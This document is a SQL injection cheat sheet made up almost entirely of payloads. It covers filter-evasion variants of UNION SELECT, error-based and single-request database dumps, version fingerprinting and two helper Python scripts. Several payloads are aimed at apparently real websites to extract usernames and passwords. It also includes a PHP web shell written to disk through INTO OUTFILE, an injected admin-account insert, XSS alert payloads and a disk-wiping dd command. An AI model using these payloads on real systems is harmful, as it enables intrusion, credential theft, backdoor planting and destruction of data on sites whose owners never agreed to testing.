g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29

CoNcAt()

CONCAT(DISTINCT Version())

concat(,0x3a,)

concat%00()

%00CoNcAt()

/*!50000cOnCat*/(/*!Version()*/)

/*!50000cOnCat*/

/**//*!12345cOnCat*/(,0x3a,)

concat_ws()
concat(0x3a,,0x3c62723e)

/*!concat_ws(0x3a,)*/

concat_ws(0x3a3a3a,version())

CONCAT_WS(CHAR(32,58,32),version(),)

REVERSE(tacnoc)

binary(version())

uncompress(compress(version()))

aes_decrypt(aes_encrypt(version(),1),1)

==================================================================================================
==================================

To make the column numbers appear in the page, put one of these after the id value (it falsifies the original WHERE so only the UNION rows are returned):

==================================================================================================
==================================

id=1+and+1=0+union+select+1,2,3,4,5,6

+AND+1=0

/*!aND*/ 1 like 0
+/*!and*/+1=0

+and+2>3+

+and(1)=(0)

and (1)!=(0)

+div+0

Having+1=0

==================================================================================================
=================================

Function bypassing (wrap the selected value so a filter on the plain function name or output still lets the result through)

==================================================================================================
=================================

unhex(hex(value))

cast(value as char)

uncompress(compress(version()))

cast(version() as char)

aes_decrypt(aes_encrypt(version(),1),1)
binary(version())

convert(value using ascii)

==================================================================================================
=================================

Injection whose output ends up in the page source

==================================================================================================
=================================

When the injected value lands inside an HTML tag, attribute or comment it is not visible in the rendered page. Prepend a sequence that closes the enclosing markup (0x223e = ">, 0x273e27 = '>') and append one that opens a new tag or comment (0x3c696d67207372633d22 = <img src=", 0x3c212d2d = <!--) so the value renders on screen; the title variants (0x273c2f7469746c653e27 = '</title>') do the same for output that ends up inside <title>:

concat(0x223e,@@version)

concat(0x273e27,version(),0x3c212d2d)

concat(0x223e3c62723e,version(),0x3c696d67207372633d22)

concat(0x223e,@@version,0x3c696d67207372633d22)
concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)

concat(0x223e3c62723e,@@version,0x3a,"BlackRose",0x3c696d67207372633d22)

concat('',@@version,'')

concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)

concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)

==================================================================================================
=================================

get version – DB_NAME – user – HOST_NAME – datadir

==================================================================================================
=================================

version()

convert(version() using latin1)

unhex(hex(version()))

@@GLOBAL.VERSION

(substr(@@version,1,1)=5) :: 1 true, 0 false

# like #
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 --

==================================================================================================
================================

+and substring(version(),1,1)=4

+and substring(version(),1,1)=5

+and substring(version(),1,1)=9

+and substring(version(),1,2)=10      (MariaDB 10.x; a single character can never equal 10, so take two)

Version comments: MySQL executes the body of /*!NNNNN ...*/ only when its own version number (MMmmrr, so 50095 = 5.0.95) is at or above NNNNN. A syntax error placed inside one therefore fires only on servers at or above that number: "error" means the server is >= NNNNN, "no error" means it is below. Move NNNNN until the error appears and disappears and you have the exact version:

id=1 /*!50094aaaa*/ error        (server is at least 5.0.94)

id=1 /*!50095aaaa*/ no error     (server is below 5.0.95, so exactly 5.0.94)

id=1 /*!50096aaaa*/ no error

# like # http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/

id=1 /*!40123 1=1*/--+- no error   (valid SQL inside the comment never errors, whatever the version)

id=1 /*!40122rrrr*/ no error

# like # http://www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
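How the version-comment probe above turns into an exact version number, as an added example (this code is not from the sheet): a binary search over NNNNN driven by an error/no-error oracle. The oracle is simulated with a constructed server version so the script runs offline; against a real target, `simulated_server` would be replaced by a function that sends the probe and reports whether the response turned into the error page.

```python
"""Pin a MySQL server version with /*!NNNNN ... */ version comments.

MySQL executes the body of /*!NNNNN body */ only when its own version
number (MMmmrr, e.g. 50095 = 5.0.95) is >= NNNNN. Injecting
/*!NNNNN aaaa*/ therefore raises a SQL error exactly when
server_version >= NNNNN, which is a boolean oracle we can binary-search.
"""
from typing import Callable

MIN_VERSION = 40000   # 4.0.0 (assumption: older servers are out of scope)
MAX_VERSION = 99999


def version_comment_probe(n: int) -> str:
    """Fragment appended after the injectable id value."""
    return f" /*!{n:05d}aaaa*/"


def simulated_server(server_version: int) -> Callable[[str], bool]:
    """Stand-in for the HTTP request (constructed, not a real target).

    Returns an oracle that 'errors' when the comment's number is <= the
    server's own version, because only then is the garbage 'aaaa' parsed.
    """
    def errors(probe: str) -> bool:
        digits = probe.strip()[3:8]          # the NNNNN after '/*!'
        return server_version >= int(digits)
    return errors


def fingerprint_version(errors: Callable[[str], bool],
                        lo: int = MIN_VERSION, hi: int = MAX_VERSION) -> int:
    """Binary-search the largest NNNNN whose comment still raises an error.

    Invariant: errors(lo) is True (server >= lo) and the server is < hi+1.
    Returns the numeric version, e.g. 50095. About 17 probes for this range.
    """
    if not errors(version_comment_probe(lo)):
        raise ValueError("server below the search floor, or probe not injectable")
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if errors(version_comment_probe(mid)):
            lo = mid          # server >= mid
        else:
            hi = mid - 1      # server < mid
    return lo


def pretty(version: int) -> str:
    """50095 -> '5.0.95', 40122 -> '4.1.22'."""
    return f"{version // 10000}.{(version // 100) % 100}.{version % 100}"


if __name__ == "__main__":
    oracle = simulated_server(50095)          # constructed target: MySQL 5.0.95
    print(pretty(fingerprint_version(oracle)))
```

Each probe is one request, so the oracle has to tell a SQL error apart from a normal page reliably (the "error / no error" observation in the list above); a WAF that swallows the error page breaks the oracle, and the blind `substring(version(),1,1)=5` comparisons are the fallback.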

==================================================================================================
===============================

DB_NAME()

==================================================================================================
===============================

database()          (MySQL)
DB_NAME()           (MSSQL)
@@database          (listed on the sheet, but not a MySQL system variable; use database())

id=vv()             (calling a function that does not exist leaks the schema in the error text: FUNCTION <dbname>.vv does not exist)

# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,database(),4,5 --

http://www.marinaplast.com/page.php?id=vv()

user()              (MySQL)
system_user()       (MySQL)
user_name()         (MSSQL)
@@user              (not a MySQL system variable; use user())

# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 --

@@hostname          (MySQL)
HOST_NAME()         (MSSQL)
@@servername        (MSSQL)
SERVERPROPERTY('MachineName')   (MSSQL)

# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,@@hostname,4,5 --

@@datadir           (MySQL)
datadir()           (not a function; the sheet means @@datadir)

# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,@@datadir,4,5 --

ASPX / MSSQL (error based: the server cannot convert @@version to a number and echoes the value in the error)

and 1=0/@@version

' and 1=0/@@version;--
') and 1=@@version--

and 1=0/user;--

Single-request methods

[DUMP DB in 1 Request]

(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' * ',table_schema,' + >',table_name,' > ',column_name))))x)

(select(@) from (select (@:=0x00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)

The user variable @ accumulates one row per iteration; the (@) in (@:=concat(...)) condition forces the assignment to be evaluated for every row, so one subquery returns the whole listing.

==================================================================================================
=================================

[DUMP DB in 1 Request improve]

==================================================================================================
=================================

(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)

(0x696e666f726d6174696f6e5f736368656d61 = information_schema, 0x3c62723e = <br>: every schema except information_schema is walked and the rows are separated with <br> so the listing renders readably)

like

http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --

==================================================================================================
=================================

#2#

==================================================================================================
=================================
Alternative method: dump DB in one request with benchmark()

==================================================================================================
=================================

concat(@i:=0x00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o)

benchmark() re-evaluates its expression 40 times; each pass appends the next table (the first one sorted after the name stored in @i) to @o, so @o ends up holding the first 40 tables in one response. Raise the count if the target has more tables.

like

http://www.mishnetorah.com/shop/details.php?id=-26+union+select+1,2,3,concat(@i:=0x00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21

==================================================================================================
=================================

#3#

==================================================================================================
=================================

databases

(select+count(schema_name)+from+information_schema.schemata)

# like #

http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name)+from+information_schema.schemata),4,5 --

tables

(select+count(table_name)+from+information_schema.tables)

# like #

http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name)+from+information_schema.tables),4,5 --

columns

(select+count(column_name)+from+information_schema.columns)

# like #

http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name)+from+information_schema.columns),4,5 --

==================================================================================================
=================================

#4#

==================================================================================================
=================================

Show each table with all its columns (one table per request; step the LIMIT offset to move to the next table)

CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))

+FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1--+

like

http://www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1--+

==================================================================================================
=================================

#5# WAF

==================================================================================================
=================================

Filtered requests (keywords wrapped in version comments, mixed case, letters percent-encoded)

# tables #

group_concat(/*!table_name*/)
+/*!froM*/ /*!InfORmaTion_scHema*/.tAblES-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -

/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()-- -

==================================================================================================
=================================

# columns #

==================================================================================================
=================================

group_concat(/*!column_name*/)

+/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=0x<hex of table name>

/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=0x<hex of table name>

/*!froM*/ table-- -

==================================================================================================
=================================

#6#

==================================================================================================
=================================

bypass method

(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())

(select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=0x<hex of table name>)

like

http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 --

==================================================================================================
=================================

#7#

==================================================================================================
=================================

bypass method

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))

/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)

(char(37,112,97,115,115,37) = %pass%: finds every column whose name contains "pass" without writing a quoted string)

like

http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)--

==================================================================================================
=================================

[+] Union Select:

==================================================================================================
=================================

union /*!select*/+
union/**/select/**/

/**/union/**/select/**/

/**/union/*!50000select*/

/**//*!12345UNION SELECT*//**/

/**//*!50000UNION SELECT*//**/

/**/uniUNIONon/**/selSELECTect/**/

/**/uniUNIONon/**/aALLll/**/selSELECTect/**/

/**//*!union*//**//*!select*//**/

/**/UNunionION/**/SELselectECT/**/

/**//*UnIOn*//**//*SEleCt*//**/

/**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/

/**/UNunionION/**/all/**/SELselectECT/**/

/**//*UnIOn*//**/all/**//*SEleCt*//**/

/**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/

uni

%20union%20/*!select*/%20

union%23aa%0Aselect

union+distinct+select+

union+distinctROW+select+

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/

%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+

/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+

/*!u%6eion*/+/*!se%6cect*/+

1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23

/*!50000%55nIoN*/+/*!50000%53eLeCt*/

union /*!50000%53elect*/
+%2F**/+Union/*!select*/

%55nion %53elect

+–+Union+–+Select+–+

+UnIoN/*&a=*/SeLeCT/*&a=*/

uNiOn aLl sElEcT

uUNIONnion all sSELECTelect

union(select(1),2,3)

union (select 1111,2222,3333)

union (/*!/**/ SeleCT */ 11)

%0A%09UNION%0CSELECT%10NULL%

/*!union*//*–*//*!all*//*–*//*!select*/

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C

union+sel%0bect

+uni*on+sel*ect+

+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a

union(select (1),(2),(3),(4),(5))

UNION(SELECT(column)FROM(table))

id=1+'UnI"On'+'SeL"ECT'

id=1+'UnI'||'on'+SeLeCT'

union select 1--+%0A,2--+%0A,3--+%0A etc.

==================================================================================================
=================================

[+] Buffer overflow (a long literal that overruns the filter's inspection buffer, so the UNION that follows is never examined):

==================================================================================================
=================================

+And(select 1)=(select 0x414)+union+select+1--

+And(select 1)=(select 0xAAAA)+union+select+1--

+and (/*!select*/ 1)=(/*!select*/ 0xAA)+

+and (/*!select*/ 1)=(/*!select*/ 0x414)+

+And(select 1)=(select 0x4141414141...4141)+   (the literal is a run of several hundred 0x41 bytes; its only job is to be long)

==================================================================================================
=================================

ERROR BASED

==================================================================================================
=================================

=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

Database

21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Table_name

and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Columns

21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

(0x73657474696e6773 = settings)

Extract data

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Notice the LIMIT clause in the query: each request returns one row, so step the offset until nothing new comes back.

A site can have more than two databases, so keep increasing the offset until you have all schema names; the same goes for table, column and data rows.

Example: limit 0,1, then limit 1,1, then limit 2,1

==================================================================================================
=================================

Differences: both forms rely on the same duplicate-key error; the "double query" form only wraps the value in 0x7e,0x27 (~') so it is easy to pick out of the error text, and uses LIMIT N,1 to walk the rows.

Error Based Query for Database Extraction:

==================================================================================================
=================================

and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Double Query for Database Extraction:

and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1

==================================================================================================
=================================

WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))--+

(error based through XPath: extractvalue() rejects the invalid expression and quotes it in the error message, and the expression is the data)

==================================================================================================
=================================

Download any live Linux, boot from it and wipe the disk with dd and urandom. After that NOBODY recovers anything.

Code: dd if=/dev/urandom of=/dev/sda bs=1M

I'd say using concat(0xY)

Y being '' in hex

union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e)

http://zerocoolhf.altervista.org/level2.php?id=-1%27%20union%20select%20*%20from%28%28select%201%29a%20join%20%28select%20version%28%29%29b%20join%20%28select%20database%28%29%29c%29--+

(comma-free UNION row: select * from ((select 1)a join (select version())b join (select database())c) yields one column per joined subselect, for filters that block the comma)

union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat('0x',hex('users'))

(as written this never matches: concat() yields the string "0x7573657273", not a hex literal. Write table_name=0x7573657273 directly, which is the quoteless form the idea is after)

=113'+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,' * ',table_schema,' + >',table_name,' > ',column_name,0x27293B3C2F7363726970743E))))x),3--+--

(0x3C7363726970743E616C6572742827 = <script>alert(' and 0x27293B3C2F7363726970743E = ');</script>: every row is wrapped so the listing pops up as alerts)

Injection that adds a new user (needs stacked queries, or an injection point that already sits inside an INSERT)

INSERT INTO admins (`name`,`password`,`email`) VALUES ('unix','unixunix','[email protected]')

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHEX+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

CHALLENGES

Code:

=(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(information_schema.columns)where(table_schema=database())and(table_name=0x7365637572697479))--+-

=12+and+false/*!union*/ /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f6e7420636f6c6f723d626c75653e3c68323e706833776c,15 from information_schema.tables where table_schema=0x66616272697a696f5f636572697070 LiMit 0,1--

=/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security–

=121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7-- -

=121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)–+-

=121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |

null'+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata-- x

==================================================================================================
=================================

Error Based:

==================================================================================================
=================================

+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150) from rmdsz_user),floor(rand(0)*2)) having min(0) or 1-- -

or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 -- -

and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x

(the three-row derived table (select 1 union select 2 union select 3) supplies exactly the rows the duplicate-key trick needs, so the GROUP BY does not have to run over information_schema)

or 1=convert(int,(@@version))--      (MSSQL)

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

(42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))–+-
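Why the `count(*) ... group by concat(<value>, floor(rand(0)*2))` queries in this list and in the ERROR BASED section above raise a duplicate-key error that carries the value, as an added example that is not part of the sheet: it re-implements MySQL's RAND() generator seeded the way RAND(0) seeds it, and the commonly documented GROUP BY behaviour (the key expression is evaluated once to look up the group and again when the group has to be inserted). The version string used as sample data is constructed.

```python
"""Reproduce MySQL's 'Duplicate entry' error-based leak offline.

MySQLRand follows my_rnd(): a linear congruential generator over
max_value 0x3FFFFFFF, with RAND(N) seeding seed1 = N*0x10001 + 55555555
and seed2 = N*0x10000001. RAND(0) is therefore deterministic, which is
the whole reason the payloads use rand(0) and not rand().
"""
from __future__ import annotations

MAX_VALUE = 0x3FFFFFFF


class MySQLRand:
    """MySQL's my_rnd() generator."""

    def __init__(self, seed_arg: int = 0):
        # Item_func_rand::seed_random(): seeds derived from RAND(N)'s argument
        self.seed1 = (seed_arg * 0x10001 + 55555555) % MAX_VALUE
        self.seed2 = (seed_arg * 0x10000001) % MAX_VALUE

    def next(self) -> float:
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand0_times_2(n: int) -> list[int]:
    """First n values of floor(rand(0)*2): 0, 1, 1, 0, 1, 1, ..."""
    r = MySQLRand(0)
    return [int(r.next() * 2) for _ in range(n)]


def group_by_rand_key(rows: int, data: str = "5.5.62~") -> tuple[int, str]:
    """Model `select count(*),concat(data,floor(rand(0)*2)) x from t group by x`
    fed with `rows` input rows (data is a constructed sample, e.g. version()).

    GROUP BY fills a temporary table keyed on x. For each row the key is
    evaluated for the lookup; if the group does not exist yet the key is
    evaluated AGAIN for the insert, consuming the next rand() value. With
    the 0,1,1,0,1,1 sequence that collides on the third row.

    Returns (row_number_that_failed, error_message); (0, "") means the
    query succeeded and nothing leaked.
    """
    r = MySQLRand(0)
    groups: dict[str, int] = {}
    for row in range(1, rows + 1):
        key = data + str(int(r.next() * 2))       # evaluation for the lookup
        if key in groups:
            groups[key] += 1
            continue
        key = data + str(int(r.next() * 2))       # re-evaluated for the insert
        if key in groups:
            return row, f"Duplicate entry '{key}' for key 'group_key'"
        groups[key] = 1
    return 0, ""


if __name__ == "__main__":
    print(floor_rand0_times_2(6))        # [0, 1, 1, 0, 1, 1]
    print(group_by_rand_key(2))          # (0, '')  two rows: no error, no leak
    print(group_by_rand_key(3))          # fails on row 3 with the value in the message
```

Two consequences follow directly: the driving table must provide at least three rows (hence `information_schema.tables`, or the `select 1 union select 2 union select 3` derived table), and the value is truncated to the key length the temporary table allows, which is why the payloads wrap it in `mid(...,1,25)` or `substr(...,1,150)` and page through it.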

==================================================================================================
=================================

WAF BYPASS BY TOTTI

==================================================================================================
=================================

=-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_name)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())-- -

=2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name) /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -

==================================================================================================
=================================

WUBI --
1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x69)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2020203d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4--

(0x69 is a truncated information_schema literal; use the full 0x696e666f726d6174696f6e5f736368656d61)

(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' * ',table_schema,' + >',table_name,' > ',column_name))))x)

(select (@) from (select (@:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)

==================================================================================================
=================================

+and+1=convert(int,SERVERPROPERTY('ProductVersion'))      (MSSQL)

==================================================================================================
=================================

http://zerofreak.blogspot.it/2012/02/tutorial-by-zer0freak-zer0freak-sqli.html

http://www.websec.ca/kb/sql_injection

http://www.hellboundhackers.org/articles/862-mysql-injection-complete-tutorial.html

==================================================================================================
=================================
Test cases

http://www.mt.ro/nou/articol.php?id=-angajari'+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))--+

.....

http://www.mt.ro/nou/articol.php?id=-angajari' and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x64625f6d74 limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

SELECT "<?php system($_REQUEST['cmd']); ?>"

INTO OUTFILE "full/path/here/cmd.php"

(needs the FILE privilege and a web-served, writable path; secure_file_priv blocks it on newer servers)

------------Best Bypass WAF------------


========================

[~] order by [~]

/**/ORDER/**/BY/**/

/*!order*/+/*!by*/

/*!ORDER BY*/

/*!50000ORDER BY*/

/*!50000ORDER*//**//*!50000BY*/

/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]

/*!00000Union*/ /*!00000Select*/

/*!50000%55nIoN*/ /*!50000%53eLeCt*/

%55nion %53elect
%55nion(%53elect 1,2,3)-- -

+union+distinct+select+

+union+distinctROW+select+

/**//*!12345UNION SELECT*//**/

/**//*!50000UNION SELECT*//**/

/**/UNION/**//*!50000SELECT*//**/

/*!50000UniON SeLeCt*/

union /*!50000%53elect*/

+ #?uNiOn + #?sEleCt

+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt

/*!%55NiOn*/ /*!%53eLEct*/

/*!u%6eion*/ /*!se%6cect*/

+un/**/ion+se/**/lect

uni%0bon+se%0blect

%2f**%2funion%2f**%2fselect

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

REVERSE(noinu)+REVERSE(tceles)

/*--*/union/*--*/select/*--*/

union (/*!/**/ SeleCT */ 1,2,3)

/*!union*/+/*!select*/

union+/*!select*/

/**/union/**/select/**/

/**/uNIon/**/sEleCt/**/

+%2F**/+Union/*!select*/

/**//*!union*//**//*!select*//**/

/*!uNIOn*/ /*!SelECt*/

uNiOn aLl sElEcT

UNIunionON+SELselectECT

/**/union/*!50000select*//**/

0%a0union%a0select%09

%0Aunion%0Aselect%0A

%55nion/**/%53elect

uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/

%0A%09UNION%0CSELECT%10NULL%

/*!union*//*--*//*!all*//*--*//*!select*/

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

+UnIoN/*&a=*/SeLeCT/*&a=*/

union+sel%0bect

+uni*on+sel*ect+

+#1q%0Aunion all#qa%0A#%0Aselect

union(select (1),(2),(3),(4),(5))

UNION(SELECT(column)FROM(table))

%23xyz%0AUnIOn%23xyz%0ASeLecT+

%23xyz%0A%55nIOn%23xyz%0A%53eLecT+

union(select(1),2,3)

union (select 1111,2222,3333)

uNioN (/*!/**/ SeleCT */ 11)

+#1q%0AuNiOn all#qa%0A#%0AsEleCt

/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/

+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+

+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C

/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/

+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+

/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/

Typical filter patterns the variants above are built to slip past (filter regexes, not payloads):

/union\sselect/g

/union\s+select/i
/*!UnIoN*/SeLeCT

+uni>on+sel>ect+

+(UnIoN)+(SelECT)+

+(UnI)(oN)+(SeL)(EcT)

+'UnI"On'+'SeL"ECT'

+uni on+sel ect+

+/*!UnIoN*/+/*!SeLeCt*/+

uni%20union%20/*!select*/%20

union%23aa%0Aselect

/**/union/*!50000select*/

/^.*union.*$/ /^.*select.*$/      (filter regexes again, not payloads)

/*union*/union/*select*/select+

/*uni X on*/union/*sel X ect*/

+un/**/ion+sel/**/ect+

+UnIOn%0d%0aSeleCt%0d%0a

UNION/*&test=1*/SELECT/*&pwn=2*/

un?+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+

+uni%0bon+se%0blect+

%252f%252a*/union%252f%252a /select%252f%252a*/

/%2A%2A/union/%2A%2A/select/%2A%2A/

%2f**%2funion%2f**%2fselect%2f**%2f

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

/*!UnIoN*/SeLecT+
